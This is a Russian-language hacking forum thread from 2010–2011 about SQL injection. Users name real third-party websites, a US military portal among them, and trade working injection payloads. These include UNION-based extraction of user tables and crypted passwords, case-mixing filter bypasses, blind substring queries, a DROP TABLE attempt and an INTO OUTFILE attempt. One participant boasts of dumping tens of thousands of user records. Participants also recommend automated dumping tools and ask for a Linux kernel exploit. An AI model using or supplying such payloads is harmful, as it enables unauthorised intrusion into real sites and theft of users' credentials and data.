RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-12-27 20:52:54.990000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: AndreySasovo quote:
ORIGINAL: lion777 А я нашёл сцылку http://ncix.com/electronics/?page=5 но т.к. я тупой то не знаю че дальше….. Чего за БД?Заранее спасибо. Нет там ниче забудь.иди готовься к новому году:)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-03 00:22:10.333333
|
|
|
ebaw_kak_f0rest
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-28 13:17:00.740000
|
zen.servegame.com Нужна база accountserver. Как я могу её достать? Ибо всё что читал ничего не понял, ибо я чехлина в этом деле. Кто может помочь, в лс отпишите =)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-04 00:35:13.653333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: ebaw_kak_f0rest zen.servegame.com Нужна база accountserver. Как я могу её достать? Ибо всё что читал ничего не понял, ибо я чехлина в этом деле. Кто может помочь, в лс отпишите =) quote:
zen.servegame.com если тут нет инжекта, то что ты хочешь услышать в ответ? Посмотри на название темы!!! Если есть баг - в студию!
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-04 03:56:18.230000
|
|
|
ebaw_kak_f0rest
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-28 13:17:00.740000
|
quote:
ORIGINAL: sepo quote:
ORIGINAL: ebaw_kak_f0rest zen.servegame.com Нужна база accountserver. Как я могу её достать? Ибо всё что читал ничего не понял, ибо я чехлина в этом деле. Кто может помочь, в лс отпишите =) quote:
zen.servegame.com если тут нет инжекта, то что ты хочешь услышать в ответ? Посмотри на название темы!!! Если есть баг - в студию! quote:
если тут нет инжекта, то что ты хочешь услышать в ответ? Посмотри на название темы!!! Если есть баг - в студию! В том то и дело что я ни разу не разбираюсь в этом, но вот парень с ником DdosAttack также зареганый тут говорил что взломал и вытащил бд - тоесть инжект есть. Если бы я знал как определить есть там баг или нет это было бы круто.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-04 14:27:11.576666
|
|
|
EnemyOfIntelligence
Сообщений: 10
Оценки: 0
Присоединился: 2011-01-01 20:46:34.003333
|
quote:
ORIGINAL: ebaw_kak_f0rest quote:
ORIGINAL: sepo quote:
ORIGINAL: ebaw_kak_f0rest zen.servegame.com Нужна база accountserver. Как я могу её достать? Ибо всё что читал ничего не понял, ибо я чехлина в этом деле. Кто может помочь, в лс отпишите =) quote:
zen.servegame.com если тут нет инжекта, то что ты хочешь услышать в ответ? Посмотри на название темы!!! Если есть баг - в студию! quote:
если тут нет инжекта, то что ты хочешь услышать в ответ? Посмотри на название темы!!! Если есть баг - в студию! В том то и дело что я ни разу не разбираюсь в этом, но вот парень с ником DdosAttack также зареганый тут говорил что взломал и вытащил бд - тоесть инжект есть. Если бы я знал как определить есть там баг или нет это было бы круто. quote:
ukrtransdisel.com/?page=cat&evt=show&gr_id=-4+union+select+1,2,3,group_concat(schema_name,0x0b),5,6,7,8+from+information_schema.schemata–&g_id=2 1)тема называется sql-injection 2)Принцип атаки внедрения SQL Допустим, серверное ПО, получив входной параметр id, использует его для создания SQL-запроса.(: http://example.org/script.php?id=) у тебя даже нет такого параметра, что уж тебе говорить про фильтрацию…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-04 14:42:15.536666
|
|
|
zoha
Сообщений: 8
Оценки: 0
Присоединился: 2008-02-01 09:15:58.113333
|
вот нашел скулл http://www.mibf.ru/index.php?id=23+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10– здесь уже ничего не выводит пустой экран!!! что делать дальше???
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-04 16:06:00.560000
|
|
|
ebaw_kak_f0rest
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-28 13:17:00.740000
|
quote:
1)тема называется sql-injection 2)Принцип атаки внедрения SQL Допустим, серверное ПО, получив входной параметр id, использует его для создания SQL-запроса.(: http://example.org/sсriрt.php?id=) у тебя даже нет такого параметра, что уж тебе говорить про фильтрацию… Можно тогда поинтересоваться как этот сайт взломал DdosAttack?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-04 16:15:44.853333
|
|
|
GreeF
Сообщений: 243
Оценки: 0
Присоединился: 2010-02-19 22:24:49.863333
|
quote:
Можно тогда поинтересоваться как этот сайт взломал DdosAttack? Найдена и сбручена главная дериктория/Залит шелл/трой И ещё много других вариантов.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-06 00:03:53.633333
|
|
|
ilya20069
Сообщений: 7
Оценки: 0
Присоединился: 2010-08-16 15:04:42.736666
|
http://www.xakep.ru/post/39990/Joomla!-SQL-Injection-Exploit.txt там эксплоит, вопрос нубский - в каком расширении сохранить, чем открыть, браузером или ставить сервер и запускать оттуда?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-06 00:19:31.293333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: zoha вот нашел скулл http://www.mibf.ru/index.php?id=23+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10– здесь уже ничего не выводит пустой экран!!! что делать дальше??? Пробуй это:) http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),0x27,10+–+ или http://www.mibf.ru/index.php?id=9999999+union+select+1,2,3,4,5,6,7,concat(table_name),0x3b,10+from+information_schema.tables–+ или качай sqlhelper 2.7 там все отлично выводится;)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-10 21:14:36.373333
|
|
|
lion777
Сообщений: 169
Оценки: 0
Присоединился: 2010-08-11 01:09:56.026666
|
Как вот это раскрутить?Это вроде PostgreSql. Ничего не пойму в этих БД.Может есть какой то универсальный способ эксплуатации СКУЛЕЙ таких БД? http://www.upto11.net/albumprofile.php?al=300824 Заранее спасибо.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-12 12:16:41.903333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: lion777 Как вот это раскрутить?Это вроде PostgreSql. Ничего не пойму в этих БД.Может есть какой то универсальный способ эксплуатации СКУЛЕЙ таких БД? http://www.upto11.net/albumprofile.php?al=300824 Заранее спасибо. Парниш,походу дела никто не хотит тебе помогать:) что ж помогу я немного.Зайди сюда Http://forum.k0d.cc/showthread.php?t=5170 там есть много инфы,в том числе и по postgi'ям инъекциям:),удач
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-13 09:02:35.206666
|
|
|
$lipknot3
Сообщений: 10
Оценки: 0
Присоединился: 2010-12-24 12:52:08.230000
|
люди, поскажите как в SQLI Helper v 2.7 юзать Visible col, ParamKey, No.Col., Method.….каак эт че менять когда зачем и для чего? , а то пишет иногда такое Could not get no. of columns for uknown reasons, if you entered a 'true keyword' and nothing, get the columns manually sql вроде есть, с чекера от AC1D беру, а DataBase нету блин[&:] да и зачем хелпер пытаеца чтото найдти, если пишет URL is not vulnerable? есть ли смысл ждать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-13 14:41:55.803333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: $lipknot3 люди, поскажите как в SQLI Helper v 2.7 юзать Visible col, ParamKey, No.Col., Method.….каак эт че менять когда зачем и для чего? , а то пишет иногда такое Could not get no. of columns for uknown reasons, if you entered a 'true keyword' and nothing, get the columns manually sql вроде есть, с чекера от AC1D беру, а DataBase нету блин[&:] да и зачем хелпер пытаеца чтото найдти, если пишет URL is not vulnerable? есть ли смысл ждать? Visible col-видимый столбец при sql инъекции, ParamKey-вроде слово или фраза(ключ)который всплывает про sql инъекции ,т.е.если запрос правильный или неправильный как их отличить, No.Col.-количества столбцов после union+select, Method-пост или гет .Эти параметры обычно определяются автоматом:)но если хочется убыстрить процесс… URL is not vulnerable-стоит ли ждать или нет? Я думаю стоит у меня бывало показывает URL is not vulnerable,а на 99 столбце вспылает sql .лучше перестраховаться и просканить sql еще и havij'ом например ,так как sqlhelper вскрывает только легкие инъекции (не всегда правда)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-14 18:39:37.636666
|
|
|
aloola
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-03 22:25:14.846666
|
Привет! Не могу разобратся с MID(group_concat),1,1024 Если ставлю MID(group_concat),1024,2028 то все равно послений символ остается 1024-ый. В чем может быть проблемма? Надо слить большой объем инфо.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-14 22:04:13.390000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: aloola Привет! Не могу разобратся с MID(group_concat),1,1024 Если ставлю MID(group_concat),1024,2028 то все равно послений символ остается 1024-ый. В чем может быть проблемма? Надо слить большой объем инфо. Надо слить большой объем инфо через sql? Нет проблем:) есть спец проги типа sql dumper и ему подобные .Я лично сливал по 70.тонн узеров и более.настройки простейшие.Погугли:)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-15 17:51:48.246666
|
|
|
aloola
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-03 22:25:14.846666
|
quote:
ORIGINAL: AndreySasovo quote:
ORIGINAL: aloola Привет! Не могу разобратся с MID(group_concat),1,1024 Если ставлю MID(group_concat),1024,2028 то все равно послений символ остается 1024-ый. В чем может быть проблемма? Надо слить большой объем инфо. Надо слить большой объем инфо через sql? Нет проблем:) есть спец проги типа sql dumper и ему подобные .Я лично сливал по 70.тонн узеров и более.настройки простейшие.Погугли:) Спасибо, все слил. Sql Helper.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-16 07:52:32.136666
|
|
|
$lipknot3
Сообщений: 10
Оценки: 0
Присоединился: 2010-12-24 12:52:08.230000
|
quote:
чем проверял или как?обычно havij sql даже слепые крутит:) [&:] RedEyEScan.exe вроде, эта прога толи на испанском, итальянском хз….. а ты можеш посоветовать какие нибудь проги для поиска сайтов с уязвимостями? спс за ответы:)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-17 12:09:53.583333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
$lipknot3,смотри тут и выбирай любой:)—>> http://forum.k0d.cc/showthread.php?t=5170
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-18 15:26:43.096666
|
|
|
antiporno
Сообщений: 79
Оценки: 0
Присоединился: 2010-12-24 14:22:00.863333
|
Как правильно сделать запрос на удаление таблицы? Пытаюсь сделать так. id=86;+drop+tables+users Но почему то иду смотреть в 74+union+select+1,table_name,3,4+from+information_schema.tables Она там стоит. Или я не правильно делаю запрос?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-22 06:44:35.033333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Для линуха подскажите эксплоит : 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-24 23:08:06.103333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577union+select+1,version(),3,4,5,6,7,8,9,10--
Буду очень благодарен тому кто выкурит таблицы юзеров… Вот ещё одна… http://droop.ktsltd.co.uk/viewdepartment.php?dept='1 думаю 5 ветка… но лучге вы мне подскажите что и как…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-26 00:17:38.100000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: sepo http://www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577union+select+1,version(),3,4,5,6,7,8,9,10--
Буду очень благодарен тому кто выкурит таблицы юзеров… Вот ещё одна… http://droop.ktsltd.co.uk/viewdepartment.php?dept='1 думаю 5 ветка… но лучге вы мне подскажите что и как… По первой тебе тока брут поможет гугли:)ибо немало сейчас есть прог для брута столбцов и колонок в 4 ветке мускула , во второй скуле элементарный фильтр на базовые словосочетания типа:"table_name","column_name","select","columns" и "tables" и элементарно обходятся МоЛоДёЖнЫм написанием,например: http://droop.ktsltd.co.uk/viewdepartment.php?dept=-5+union+sELecT+1,2,group_concat(column_namE,0x0b),4+from+information_schema.columnS+where+TaBle_naMe=0x7573657273– И в конечном итоге получаем узеров: http://droop.ktsltd.co.uk/viewdepartment.php?dept=-5+union+sELecT+1,2,group_concat(ID,0x3a,UserName,0x3a,HTMLName,0x3a,CryptedPassword,0x3a,Rights,0x3a,Nations,0x0b),4+from+users–
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-27 12:49:52.020000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: AndreySasovo quote:
ORIGINAL: sepo http://www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577union+select+1,version(),3,4,5,6,7,8,9,10--
Буду очень благодарен тому кто выкурит таблицы юзеров… Вот ещё одна… http://droop.ktsltd.co.uk/viewdepartment.php?dept='1 думаю 5 ветка… но лучге вы мне подскажите что и как… По первой тебе тока брут поможет гугли:)ибо немало сейчас есть прог для брута столбцов и колонок в 4 ветке мускула , во второй скуле элементарный фильтр на базовые словосочетания типа:"table_name","column_name","select","columns" и "tables" и элементарно обходятся МоЛоДёЖнЫм написанием,например: http://droop.ktsltd.co.uk/viewdepartment.php?dept=-5+union+sELecT+1,2,group_concat(column_namE,0x0b),4+from+information_schema.columnS+where+TaBle_naMe=0x7573657273– И в конечном итоге получаем узеров: http://droop.ktsltd.co.uk/viewdepartment.php?dept=-5+union+sELecT+1,2,group_concat(ID,0x3a,UserName,0x3a,HTMLName,0x3a,CryptedPassword,0x3a,Rights,0x3a,Nations,0x0b),4+from+users– Со второй я уже и сам разобрался… тебе спасибо что откликнулся, а вот по первой чёт никак… юзал брут и ничего… будто там и нет никаких таблиц…((
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-28 00:16:22.476666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Юзай исходный код в станице регистрации.мне помогало.возможно (скорее всего)хитрый префикс или смотри выводы если есть какие нибудь данные может где и префикс засветится:) Пример:www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577union+select+1,ID,3,4,5,6,7,8,9,10+from+sonc.REGION– Как видишь из sql регистр верхний преобладает значит не исключено что и остальные колонки и столбцы тоже могут быть в верхнем регистре.Не видел не узеров и не нашел админку .может там и нет никого?одни новости и обзоры в базе?смысл тогда брутить?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-28 13:31:29.750000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: AndreySasovo Юзай исходный код в станице регистрации.мне помогало.возможно (скорее всего)хитрый префикс или смотри выводы если есть какие нибудь данные может где и префикс засветится:) Пример:www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577union+select+1,ID,3,4,5,6,7,8,9,10+from+sonc.REGION– Как видишь из sql регистр верхний преобладает значит не исключено что и остальные колонки и столбцы тоже могут быть в верхнем регистре.Не видел не узеров и не нашел админку .может там и нет никого?одни новости и обзоры в базе?смысл тогда брутить? еслиб там никого не было я бы время зря не терял… за подсказку спасибо, ща посмотрим что из этого может выйти…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-01-30 14:40:32.973333
|
|
|
Merovingian
Сообщений: 59
Оценки: 0
Присоединился: 2008-12-29 13:55:36.936666
|
........
if(isset($_GET['p']))
$p=$_GET['p'];
else
$p="12";
$result=mysql_query("SELECT * FROM pages WHERE link='$p'",$db);
$myrow=mysql_fetch_array($result);
........
ВОзможна сдесь SQl-inj ??
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-02-13 21:22:19.680000
|
|
|
VasekPupkin
Сообщений: 1
Оценки: 0
Присоединился: 2011-02-13 14:09:56.210000
|
Здравствуйте. Подскажите плз, что можно сделать в данной ситуации (редактирование информации, доступ к паролям): quote:
SELECT `banki`.`id` AS bank_id, `banki`.`name` AS bank_name, `banki`.`city_id` AS city_id, `karti`.`id`, `karti`.`name`, `karti`.`proc_stavka`, `karti`.`limit`, `karti`.`srok`, `karti`.`lgotniy_period`, `karti`.`godovoe_obsluzh`, `karti`.`osobie_usloviya` FROM (`karti`) JOIN `banki` ON `bank_id` = `banki`.`id` WHERE `karti`.`city_id` = 1 AND `valyuta` = 1 AND `srok` = xxxxxххх LIMIT 10 xxxxxххх - это место для sql-инъекции, данные сюда вставляются "как есть" без обработки и без кавычек известно также, что логины и пароли хранятся в таблице users: login, password структура папок: /home/username/site.ru/system/application/controllers/… (фреймворк codeigniter) Я попробовал добавить запрос через UNION и вывести в файл: quote:
SELECT `banki`.`id` AS bank_id, `banki`.`name` AS bank_name, `banki`.`city_id` AS city_id, `karti`.`id`, `karti`.`name`, `karti`.`proc_stavka`, `karti`.`limit`, `karti`.`srok`, `karti`.`lgotniy_period`, `karti`.`godovoe_obsluzh`, `karti`.`osobie_usloviya` FROM (`karti`) JOIN `banki` ON `bank_id` = `banki`.`id` WHERE `karti`.`city_id` = 1 AND `valyuta` = 1 AND `srok` = 1 UNION SELECT login,password,null,null,null,null,null,null,null,null,null INTO OUTFILE 'text.txt' FROM users LIMIT 10 В результате оказалось, что у пользователя нет прав на работу с файлами: quote:
A Database Error Occurred Error Number: 1045 Access denied for user 'bla-bla_user'@'localhost' (using password: YES) Если просто выводить на экран результаты запроса: quote:
SELECT `banki`.`id` AS bank_id, `banki`.`name` AS bank_name, `banki`.`city_id` AS city_id, `karti`.`id`, `karti`.`name`, `karti`.`proc_stavka`, `karti`.`limit`, `karti`.`srok`, `karti`.`lgotniy_period`, `karti`.`godovoe_obsluzh`, `karti`.`osobie_usloviya` FROM (`karti`) JOIN `banki` ON `bank_id` = `banki`.`id` WHERE `karti`.`city_id` = 1 AND `valyuta` = 1 AND `srok` = 1 UNION SELECT login,password,null,null,null,null,null,null,null,null,null FROM users LIMIT 10 То оказывается, что следом на этой же странице идет еще один запрос, который считает общее количество результатов и данные уже не совпадают: quote:
Error Number: 1222 The used SELECT statements have a different number of columns SELECT COUNT(*) AS count FROM (`karti`) JOIN `banki` ON `bank_id` = `banki`.`id` WHERE `karti`.`city_id` = 1 AND `valyuta` = 1 AND `srok` = 1 UNION SELECT login,password,null,null,null,null,null,null,null,null,null FROM users Как бы подкопаться 8|:)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-02-15 11:39:31.523333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
ссылка бы многое прояснила…8| и проверь почту:)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-02-21 07:56:09.293333
|
|
|
DEH
Сообщений: 195
Оценки: 0
Присоединился: 2007-01-13 22:27:31.370000
|
quote:
ORIGINAL: Merovingian
........
if(isset($_GET['p']))
$p=$_GET['p'];
else
$p="12";
$result=mysql_query("SELECT * FROM pages WHERE link='$p'",$db);
$myrow=mysql_fetch_array($result);
........
ВОзможна сдесь SQl-inj ?? Да.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-06 16:33:53.100000
|
|
|
exT1m
Сообщений: 2
Оценки: 0
Присоединился: 2008-09-29 17:10:36.110000
|
дело такое: самописный двиг, держится на mssql. нашёл инжу в строке, к примеру: getinfo/user/13', но дело в том что кавычка ' заменяется на символ quote:
&#039; а другая кавычка, " - заменяется на quote:
&quot; т.е после запроса quote:
getinfo/user/13’ or 1=@@version– он выводит ошибку quote:
Conversion failed when converting the varchar value '13&#039;or 1=@@version–' вопрос: как обойти фильтрацию ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-08 23:16:35.676666
|
|
|
burobd1dimas
Сообщений: 11
Оценки: 0
Присоединился: 2010-10-25 11:03:10.246666
|
Здравствуйте, я только начал изучение sql-injection и вот нашел первую ошибку: http://www.praguerealestate.cz/index.php?url=commonpage&page=realcatalog&type=1&rpage=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 пытаюсь подобрать кол-во полей в ДБ, но ничего не получается! Скажите пожалуйсто, что я делаю не так и является ли вообще данная ошибка sql-injection? Спасибо
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-09 07:26:52.236666
|
|
|
lion777
Сообщений: 169
Оценки: 0
Присоединился: 2010-08-11 01:09:56.026666
|
quote:
Здравствуйте, я только начал изучение sql-injection и вот нашел первую ошибку: Для начала тяжелую себе задачку поставил.Твой линк мудреный.Вот тут смотри: http://www.praguerealestate.cz/index.php?url=detail&id=25670193 Здесь пятая ветка.Но блинданутая.Поковыряй. Но лучше чего то другое найди.Здесь брутить нужно.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-09 13:08:25.673333
|
|
|
burobd1dimas
Сообщений: 11
Оценки: 0
Присоединился: 2010-10-25 11:03:10.246666
|
спасибо, кол-во полей нашел, вывел ДБ,версию,юзера, но возникла проблема хочу посмотреть все ДБ, которые есть на сервере, пишу вот такой запрос: http://www.praguerealestate.cz/index.php?url=detail&id=-25670193+UNION+SELECT+1,2,3,4,5,schema_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142+FROM+information_schema.schemata+LIMIT+0,1 но ничего не выводится, что не так? спасибо
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-09 15:17:50.603333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Тебе же написали… крути подзапросами. http://www.praguerealestate.cz/index.php?url=detail&id=25670193+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+20,1),1,1)))>1
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-15 22:06:15.003333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
кто может помочь с инжектом? БД - ORACLE. www.manpower.usmc.mil/portal/page/portal/M_RA_HOME/aboutMRA/?_mode=' или http://www.manpower.usmc.mil//portal/page/portal/M_RA_HOME/MI/C_MIT/devappsup/Manpower_Info?_mode=%2527
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-16 19:43:58.160000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: sepo кто может помочь с инжектом? БД - ORACLE. www.manpower.usmc.mil/portal/page/portal/M_RA_HOME/aboutMRA/?_mode=' или http://www.manpower.usmc.mil//portal/page/portal/M_RA_HOME/MI/C_MIT/devappsup/Manpower_Info?_mode=%2527 Havij вроде оракл крутит нормально:)?а так посмотри на античате тема реально раскрыта:)вроде все ясно там
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-03-28 11:03:52.553333
|
|
|
erros
Сообщений: 50
Оценки: -10
Присоединился: 2010-12-08 12:56:42.960000
|
quote:
А для чего придумали гугл, кто-нибудь знает? 2erros: читай.. http://ru.wikipedia.org/wiki/Внедрение_SQL-кода спачибо=)
|
|
|
|
|